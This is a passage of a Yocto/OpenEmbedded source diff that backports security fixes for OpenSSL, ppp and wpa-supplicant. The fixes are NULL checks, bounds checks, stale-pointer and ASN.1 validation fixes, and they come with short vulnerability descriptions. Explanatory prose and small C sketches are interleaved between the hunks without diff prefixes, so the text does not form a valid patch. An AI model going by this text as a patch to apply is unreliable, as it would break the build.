+ return PKCS12_item_decrypt_d2i(p7->d.encrypted->enc_data->algorithm,
+ ASN1_ITEM_rptr(PKCS12_SAFEBAGS),
+ pass, passlen,
+@@ -159,6 +172,13 @@ STACK_OF(PKCS7) *PKCS12_unpack_authsafes
+ PKCS12_R_CONTENT_TYPE_NOT_DATA);
+ return NULL;
+ }
++
++ if (p12->authsafes->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_AUTHSAFES,
++ PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return ASN1_item_unpack(p12->authsafes->d.data,
+ ASN1_ITEM_rptr(PKCS12_AUTHSAFES));
+ }
+--- a/crypto/pkcs12/p12_mutl.c
++++ b/crypto/pkcs12/p12_mutl.c
+@@ -93,6 +93,11 @@ static int pkcs12_gen_mac(PKCS12 *p12, c
+ return 0;
+ }
+
++ if (p12->authsafes->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_DECODE_ERROR);
++ return 0;
++ }
++
+ salt = p12->mac->salt->data;
+ saltlen = p12->mac->salt->length;
+ if (!p12->mac->iter)
+--- a/crypto/pkcs12/p12_npas.c
++++ b/crypto/pkcs12/p12_npas.c
+@@ -78,8 +78,9 @@ static int newpass_p12(PKCS12 *p12, cons
+ bags = PKCS12_unpack_p7data(p7);
+ } else if (bagnid == NID_pkcs7_encrypted) {
+ bags = PKCS12_unpack_p7encdata(p7, oldpass, -1);
+- if (!alg_get(p7->d.encrypted->enc_data->algorithm,
+- &pbe_nid, &pbe_iter, &pbe_saltlen))
++ if (p7->d.encrypted == NULL
++ || !alg_get(p7->d.encrypted->enc_data->algorithm,
++ &pbe_nid, &pbe_iter, &pbe_saltlen))
+ goto err;
+ } else {
+ continue;
+--- a/crypto/pkcs7/pk7_mime.c
++++ b/crypto/pkcs7/pk7_mime.c
+@@ -30,10 +30,13 @@ int SMIME_write_PKCS7(BIO *bio, PKCS7 *p
+ {
+ STACK_OF(X509_ALGOR) *mdalgs;
+ int ctype_nid = OBJ_obj2nid(p7->type);
+- if (ctype_nid == NID_pkcs7_signed)
++ if (ctype_nid == NID_pkcs7_signed) {
++ if (p7->d.sign == NULL)
++ return 0;
+ mdalgs = p7->d.sign->md_algs;
+- else
++ } else {
+ mdalgs = NULL;
++ }
+
+ flags ^= SMIME_OLDMIME;
+
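The pattern applied by each hunk above is to verify the optional ContentInfo pointer before dereferencing it; a generic sketch of that defensive check follows (the struct and function are invented for illustration and are not the OpenSSL API):

    #include <stddef.h>
    #include <stdio.h>

    /* Simplified stand-in for a structure whose "content" member is optional
     * and may legitimately be NULL even when the type field looks valid. */
    struct content_info {
        int type;
        void *content;    /* may be NULL */
    };

    static int unpack(const struct content_info *ci)
    {
        if (ci->content == NULL) {
            fprintf(stderr, "decode error: missing content\n");
            return 0;               /* fail cleanly instead of crashing */
        }
        /* ... safe to use ci->content here ... */
        return 1;
    }

    int main(void)
    {
        struct content_info empty = { .type = 1, .content = NULL };
        return unpack(&empty) ? 0 : 1;
    }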
diff --git a/meta/recipes-connectivity/openssl/openssl/reproducibility.patch b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
new file mode 100644
index 0000000000..8accbc9df2
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
@@ -0,0 +1,22 @@
+Using localtime() means the output can depend on the timezone of the build machine.
+Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Upstream-Status: Pending [should be suitable]
+
+Index: openssl-3.0.1/apps/progs.pl
+===================================================================
+--- openssl-3.0.1.orig/apps/progs.pl
++++ openssl-3.0.1/apps/progs.pl
+@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or
+ my %commands = ();
+ my $cmdre = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/;
+ my $apps_openssl = shift @ARGV;
+-my $YEAR = [localtime()]->[5] + 1900;
++my $YEAR = [gmtime()]->[5] + 1900;
++if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) {
++ $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900;
++}
+
+ # because the program apps/openssl has object files as sources, and
+ # they then have the corresponding C files as source, we need to chain
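The same reproducibility idea expressed in C rather than Perl: prefer SOURCE_DATE_EPOCH when it is set, fall back to the current time, and always interpret the timestamp with gmtime() so the result does not depend on the build machine's timezone (illustrative sketch only):

    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>

    static int build_year(void)
    {
        time_t t = time(NULL);
        const char *sde = getenv("SOURCE_DATE_EPOCH");

        if (sde != NULL) {
            char *end = NULL;
            long long v = strtoll(sde, &end, 10);
            if (end != sde && *end == '\0' && v >= 0)
                t = (time_t)v;      /* honour the pinned build timestamp */
        }
        return gmtime(&t)->tm_year + 1900;   /* UTC, not local time */
    }

    int main(void)
    {
        printf("copyright year: %d\n", build_year());
        return 0;
    }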
diff --git a/meta/recipes-connectivity/openssl/openssl_1.1.1g.bb b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
index 815955837b..0e490eabc3 100644
--- a/meta/recipes-connectivity/openssl/openssl_1.1.1g.bb
+++ b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
@@ -17,13 +17,17 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \
file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \
file://afalg.patch \
file://reproducible.patch \
+ file://reproducibility.patch \
+ file://0001-Configure-add-2-missing-key-sorts.patch \
+ file://0001-Configure-do-not-tweak-mips-cflags.patch \
+ file://CVE-2024-0727.patch \
"
SRC_URI_append_class-nativesdk = " \
file://environment.d-openssl.sh \
"
-SRC_URI[sha256sum] = "ddb04774f1e32f0c49751e21b67216ac87852ceb056b75209af2443400636d46"
+SRC_URI[sha256sum] = "cf3098950cb4d853ad95c0841f1f9c6d3dc102dccfcacd521d93925208b76ac8"
inherit lib_package multilib_header multilib_script ptest
MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash"
@@ -179,6 +183,7 @@ do_install_ptest () {
install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps
install -d ${D}${PTEST_PATH}/engines
+ install -m755 ${B}/engines/dasync.so ${D}${PTEST_PATH}/engines
install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines
}
@@ -210,6 +215,8 @@ BBCLASSEXTEND = "native nativesdk"
CVE_PRODUCT = "openssl:openssl"
+CVE_VERSION_SUFFIX = "alphabetical"
+
# Only affects OpenSSL >= 1.1.1 in combination with Apache < 2.4.37
# Apache in meta-webserver is already recent enough
CVE_CHECK_WHITELIST += "CVE-2019-0190"
diff --git a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
index b5f68951d7..b0097aa480 100644
--- a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
+++ b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Enables PPP dial-in through a serial connection"
SECTION = "console/network"
+DESCRIPTION = "PPP dial-in provides a point-to-point protocol (PPP), so that other computers can dial up to it and access connected networks."
DEPENDS = "ppp"
RDEPENDS_${PN} = "ppp"
PR = "r8"
diff --git a/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
new file mode 100644
index 0000000000..27b8863a4e
--- /dev/null
+++ b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
@@ -0,0 +1,50 @@
+From 2aeb41a9a3a43b11b1e46628d0bf98197ff9f141 Mon Sep 17 00:00:00 2001
+From: Paul Mackerras <paulus@ozlabs.org>
+Date: Thu, 29 Dec 2022 18:00:20 +0100
+Subject: [PATCH] pppdump: Avoid out-of-range access to packet buffer
+
+This fixes a potential vulnerability where data is written to spkt.buf
+and rpkt.buf without a check on the array index. To fix this, we
+check the array index (pkt->cnt) before storing the byte or
+incrementing the count. This also means we no longer have a potential
+signed integer overflow on the increment of pkt->cnt.
+
+Fortunately, pppdump is not used in the normal process of setting up a
+PPP connection, is not installed setuid-root, and is not invoked
+automatically in any scenario that I am aware of.
+
+Upstream-Status: Backport [https://github.com/ppp-project/ppp/commit/a75fb7b198eed50d769c80c36629f38346882cbf]
+CVE: CVE-2022-4603
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ pppdump/pppdump.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/pppdump/pppdump.c b/pppdump/pppdump.c
+index 87c2e8f..dec4def 100644
+--- a/pppdump/pppdump.c
++++ b/pppdump/pppdump.c
+@@ -296,6 +296,10 @@ dumpppp(f)
+ printf("%s aborted packet:\n ", dir);
+ q = " ";
+ }
++ if (pkt->cnt >= sizeof(pkt->buf)) {
++ printf("%s over-long packet truncated:\n ", dir);
++ q = " ";
++ }
+ nb = pkt->cnt;
+ p = pkt->buf;
+ pkt->cnt = 0;
+@@ -399,7 +403,8 @@ dumpppp(f)
+ c ^= 0x20;
+ pkt->esc = 0;
+ }
+- pkt->buf[pkt->cnt++] = c;
++ if (pkt->cnt < sizeof(pkt->buf))
++ pkt->buf[pkt->cnt++] = c;
+ break;
+ }
+ }
+--
+2.25.1
+
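The fix amounts to checking the write index against the buffer size before every store; a minimal sketch of that pattern (struct pkt and pkt_append are invented for illustration):

    #include <stddef.h>
    #include <stdio.h>

    struct pkt {
        unsigned char buf[8192];
        size_t cnt;
    };

    /* Append one byte only if there is room; drop the rest so the index can
     * never run past the end of buf and never overflows. */
    static void pkt_append(struct pkt *p, unsigned char c)
    {
        if (p->cnt < sizeof(p->buf))
            p->buf[p->cnt++] = c;
    }

    int main(void)
    {
        struct pkt p = { .cnt = 0 };
        for (int i = 0; i < 10000; i++)      /* more bytes than buf can hold */
            pkt_append(&p, 0x7e);
        printf("stored %zu of 10000 bytes\n", p.cnt);   /* capped at 8192 */
        return 0;
    }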
diff --git a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
index 60c56dd0bd..51ec25e660 100644
--- a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
+++ b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
@@ -34,6 +34,7 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/${BP}.tar.gz \
file://0001-ppp-Remove-unneeded-include.patch \
file://ppp-2.4.7-DES-openssl.patch \
file://0001-pppd-Fix-bounds-check-in-EAP-code.patch \
+ file://CVE-2022-4603.patch \
"
SRC_URI_append_libc-musl = "\
@@ -42,6 +43,10 @@ SRC_URI_append_libc-musl = "\
SRC_URI[md5sum] = "78818f40e6d33a1d1de68a1551f6595a"
SRC_URI[sha256sum] = "02e0a3dd3e4799e33103f70ec7df75348c8540966ee7c948e4ed8a42bbccfb30"
+# This CVE is specific to a patch applied by Ubuntu that is not used by
+# OpenEmbedded.
+CVE_CHECK_WHITELIST += "CVE-2020-15704"
+
inherit autotools-brokensep systemd
TARGET_CC_ARCH += " ${LDFLAGS}"
diff --git a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
index 67959576e8..5f0a5eac70 100644
--- a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
+++ b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
@@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood"
HOMEPAGE = "http://packages.debian.org/resolvconf"
RDEPENDS_${PN} = "bash"
-SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=unstable \
file://fix-path-for-busybox.patch \
file://99_resolvconf \
"
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
new file mode 100644
index 0000000000..8c90fa3421
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
@@ -0,0 +1,45 @@
+From 947272febe24a8f0ea828b5b2f35f13c3821901e Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Mon, 9 Nov 2020 11:43:12 +0200
+Subject: [PATCH] P2P: Fix copying of secondary device types for P2P group
+ client
+
+Parsing and copying of WPS secondary device types list was verifying
+that the contents is not too long for the internal maximum in the case
+of WPS messages, but similar validation was missing from the case of P2P
+group information which encodes this information in a different
+attribute. This could result in writing beyond the memory area assigned
+for these entries and corrupting memory within an instance of struct
+p2p_device. This could result in invalid operations and unexpected
+behavior when trying to free pointers from that corrupted memory.
+
+Upstream-Status: Backport
+CVE: CVE-2021-0326
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=947272febe24a8f0ea828b5b2f35f13c3821901e]
+
+Credit to OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=27269
+Fixes: e57ae6e19edf ("P2P: Keep track of secondary device types for peers")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/p2p/p2p.c b/src/p2p/p2p.c
+index a08ba02..079270f 100644
+--- a/src/p2p/p2p.c
++++ b/src/p2p/p2p.c
+@@ -453,6 +453,8 @@ static void p2p_copy_client_info(struct p2p_device *dev,
+ dev->info.config_methods = cli->config_methods;
+ os_memcpy(dev->info.pri_dev_type, cli->pri_dev_type, 8);
+ dev->info.wps_sec_dev_type_list_len = 8 * cli->num_sec_dev_types;
++ if (dev->info.wps_sec_dev_type_list_len > WPS_SEC_DEV_TYPE_MAX_LEN)
++ dev->info.wps_sec_dev_type_list_len = WPS_SEC_DEV_TYPE_MAX_LEN;
+ os_memcpy(dev->info.wps_sec_dev_type_list, cli->sec_dev_types,
+ dev->info.wps_sec_dev_type_list_len);
+ }
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
new file mode 100644
index 0000000000..004b1dbd19
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
@@ -0,0 +1,58 @@
+From 8460e3230988ef2ec13ce6b69b687e941f6cdb32 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 8 Dec 2020 23:52:50 +0200
+Subject: [PATCH] P2P: Fix a corner case in peer addition based on PD Request
+
+p2p_add_device() may remove the oldest entry if there is no room in the
+peer table for a new peer. This would result in any pointer to that
+removed entry becoming stale. A corner case with an invalid PD Request
+frame could result in such a case ending up using (read+write) freed
+memory. This could only by triggered when the peer table has reached its
+maximum size and the PD Request frame is received from the P2P Device
+Address of the oldest remaining entry and the frame has incorrect P2P
+Device Address in the payload.
+
+Fix this by fetching the dev pointer again after having called
+p2p_add_device() so that the stale pointer cannot be used.
+
+Fixes: 17bef1e97a50 ("P2P: Add peer entry based on Provision Discovery Request")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-27803
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=8460e3230988ef2ec13ce6b69b687e941f6cdb32]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p_pd.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/src/p2p/p2p_pd.c b/src/p2p/p2p_pd.c
+index 3994ec0..05fd593 100644
+--- a/src/p2p/p2p_pd.c
++++ b/src/p2p/p2p_pd.c
+@@ -595,14 +595,12 @@ void p2p_process_prov_disc_req(struct p2p_data *p2p, const u8 *sa,
+ goto out;
+ }
+
++ dev = p2p_get_device(p2p, sa);
+ if (!dev) {
+- dev = p2p_get_device(p2p, sa);
+- if (!dev) {
+- p2p_dbg(p2p,
+- "Provision Discovery device not found "
+- MACSTR, MAC2STR(sa));
+- goto out;
+- }
++ p2p_dbg(p2p,
++ "Provision Discovery device not found "
++ MACSTR, MAC2STR(sa));
++ goto out;
+ }
+ } else if (msg.wfd_subelems) {
+ wpabuf_free(dev->info.wfd_subelems);
+--
+2.17.1
+
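The rule the fix enforces is that a pointer into a fixed-size table must be looked up again after any call that may evict entries; a small self-contained illustration with a hypothetical table API:

    #include <stdio.h>
    #include <string.h>

    #define TABLE_MAX 2

    struct peer { char addr[18]; int in_use; };
    static struct peer table[TABLE_MAX];

    /* Adding a peer may recycle (evict) the slot an older pointer refers to. */
    static void table_add(const char *addr)
    {
        static int next;
        struct peer *p = &table[next++ % TABLE_MAX];
        memset(p, 0, sizeof(*p));
        snprintf(p->addr, sizeof(p->addr), "%s", addr);
        p->in_use = 1;
    }

    static struct peer *table_get(const char *addr)
    {
        for (int i = 0; i < TABLE_MAX; i++)
            if (table[i].in_use && strcmp(table[i].addr, addr) == 0)
                return &table[i];
        return NULL;
    }

    int main(void)
    {
        table_add("aa:bb:cc:dd:ee:01");
        struct peer *dev = table_get("aa:bb:cc:dd:ee:01");
        (void)dev;                            /* would become stale below */
        table_add("aa:bb:cc:dd:ee:02");
        table_add("aa:bb:cc:dd:ee:03");       /* may recycle dev's slot */
        dev = table_get("aa:bb:cc:dd:ee:01"); /* re-fetch instead of trusting dev */
        printf("entry %s\n", dev ? "still present" : "was evicted");
        return 0;
    }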
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
new file mode 100644
index 0000000000..e2540fc26b
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
@@ -0,0 +1,123 @@
+From a0541334a6394f8237a4393b7372693cd7e96f15 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Sat, 13 Mar 2021 18:19:31 +0200
+Subject: [PATCH] ASN.1: Validate DigestAlgorithmIdentifier parameters
+
+The supported hash algorithms do not use AlgorithmIdentifier parameters.
+However, there are implementations that include NULL parameters in
+addition to ones that omit the parameters. Previous implementation did
+not check the parameters value at all which supported both these cases,
+but did not reject any other unexpected information.
+
+Use strict validation of digest algorithm parameters and reject any
+unexpected value when validating a signature. This is needed to prevent
+potential forging attacks.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+
+Upstream-Status: Backport
+CVE: CVE-2021-30004
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=a0541334a6394f8237a4393b7372693cd7e96f15]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/tls/pkcs1.c | 21 +++++++++++++++++++++
+ src/tls/x509v3.c | 20 ++++++++++++++++++++
+ 2 files changed, 41 insertions(+)
+
+diff --git a/src/tls/pkcs1.c b/src/tls/pkcs1.c
+index 141ac50..e09db07 100644
+--- a/src/tls/pkcs1.c
++++ b/src/tls/pkcs1.c
+@@ -240,6 +240,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestInfo",
++ hdr.payload, hdr.length);
+
+ pos = hdr.payload;
+ end = pos + hdr.length;
+@@ -261,6 +263,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestAlgorithmIdentifier",
++ hdr.payload, hdr.length);
+ da_end = hdr.payload + hdr.length;
+
+ if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -269,6 +273,23 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: Digest algorithm parameters",
++ next, da_end - next);
++
++ /*
++ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++ * omit the parameters, but there are implementation that encode these
++ * as a NULL element. Allow these two cases and reject anything else.
++ */
++ if (da_end > next &&
++ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++ !asn1_is_null(&hdr) ||
++ hdr.payload + hdr.length != da_end)) {
++ wpa_printf(MSG_DEBUG,
++ "PKCS #1: Unexpected digest algorithm parameters");
++ os_free(decrypted);
++ return -1;
++ }
+
+ if (!asn1_oid_equal(&oid, hash_alg)) {
+ char txt[100], txt2[100];
+diff --git a/src/tls/x509v3.c b/src/tls/x509v3.c
+index 1bd5aa0..bf2289f 100644
+--- a/src/tls/x509v3.c
++++ b/src/tls/x509v3.c
+@@ -1834,6 +1834,7 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: DigestInfo", hdr.payload, hdr.length);
+
+ pos = hdr.payload;
+ end = pos + hdr.length;
+@@ -1855,6 +1856,8 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: DigestAlgorithmIdentifier",
++ hdr.payload, hdr.length);
+ da_end = hdr.payload + hdr.length;
+
+ if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -1862,6 +1865,23 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: Digest algorithm parameters",
++ next, da_end - next);
++
++ /*
++ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++ * omit the parameters, but there are implementation that encode these
++ * as a NULL element. Allow these two cases and reject anything else.
++ */
++ if (da_end > next &&
++ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++ !asn1_is_null(&hdr) ||
++ hdr.payload + hdr.length != da_end)) {
++ wpa_printf(MSG_DEBUG,
++ "X509: Unexpected digest algorithm parameters");
++ os_free(data);
++ return -1;
++ }
+
+ if (x509_sha1_oid(&oid)) {
+ if (signature->oid.oid[6] != 5 /* sha-1WithRSAEncryption */) {
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
new file mode 100644
index 0000000000..21e65ba961
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
@@ -0,0 +1,609 @@
+From 208e5687ff2e48622e28d8888ce5444a54353bbd Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 27 Aug 2019 16:33:15 +0300
+Subject: [PATCH 1/4] crypto: Add more bignum/EC helper functions
+
+These are needed for implementing SAE hash-to-element.
+
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+https://w1.fi/security/2022-1/
+
+CVE: CVE-2022-23303 CVE-2022-23304
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/crypto/crypto.h | 45 ++++++++++++++++++
+ src/crypto/crypto_openssl.c | 94 +++++++++++++++++++++++++++++++++++++
+ src/crypto/crypto_wolfssl.c | 66 ++++++++++++++++++++++++++
+ 3 files changed, 205 insertions(+)
+
+diff --git a/src/crypto/crypto.h b/src/crypto/crypto.h
+index 15f8ad04cea4..68476dbce96c 100644
+--- a/src/crypto/crypto.h
++++ b/src/crypto/crypto.h
+@@ -518,6 +518,13 @@ struct crypto_bignum * crypto_bignum_init(void);
+ */
+ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len);
+
++/**
++ * crypto_bignum_init_set - Allocate memory for bignum and set the value (uint)
++ * @val: Value to set
++ * Returns: Pointer to allocated bignum or %NULL on failure
++ */
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val);
++
+ /**
+ * crypto_bignum_deinit - Free bignum
+ * @n: Bignum from crypto_bignum_init() or crypto_bignum_init_set()
+@@ -612,6 +619,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ struct crypto_bignum *c);
+
++/**
++ * crypto_bignum_addmod - d = a + b (mod c)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum
++ * @d: Bignum; used to store the result of (a + b) % c
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d);
++
+ /**
+ * crypto_bignum_mulmod - d = a * b (mod c)
+ * @a: Bignum
+@@ -625,6 +645,28 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *c,
+ struct crypto_bignum *d);
+
++/**
++ * crypto_bignum_sqrmod - c = a^2 (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result of a^2 % b
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c);
++
++/**
++ * crypto_bignum_sqrtmod - returns sqrt(a) (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c);
++
+ /**
+ * crypto_bignum_rshift - r = a >> n
+ * @a: Bignum
+@@ -731,6 +773,9 @@ const struct crypto_bignum * crypto_ec_get_prime(struct crypto_ec *e);
+ */
+ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e);
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e);
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e);
++
+ /**
+ * struct crypto_ec_point - Elliptic curve point
+ *
+diff --git a/src/crypto/crypto_openssl.c b/src/crypto/crypto_openssl.c
+index bab33a537293..ed463105e8f1 100644
+--- a/src/crypto/crypto_openssl.c
++++ b/src/crypto/crypto_openssl.c
+@@ -1283,6 +1283,24 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+
+
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++ BIGNUM *bn;
++
++ if (TEST_FAIL())
++ return NULL;
++
++ bn = BN_new();
++ if (!bn)
++ return NULL;
++ if (BN_set_word(bn, val) != 1) {
++ BN_free(bn);
++ return NULL;
++ }
++ return (struct crypto_bignum *) bn;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ if (clear)
+@@ -1449,6 +1467,28 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d)
++{
++ int res;
++ BN_CTX *bnctx;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_add((BIGNUM *) d, (const BIGNUM *) a, (const BIGNUM *) b,
++ (const BIGNUM *) c, bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ const struct crypto_bignum *c,
+@@ -1472,6 +1512,48 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ int res;
++ BN_CTX *bnctx;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_sqr((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++ bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ BN_CTX *bnctx;
++ BIGNUM *res;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_sqrt((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++ bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ struct crypto_bignum *r)
+ {
+@@ -1682,6 +1764,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ if (clear)
+diff --git a/src/crypto/crypto_wolfssl.c b/src/crypto/crypto_wolfssl.c
+index 4cedab4367cd..e9894b335e53 100644
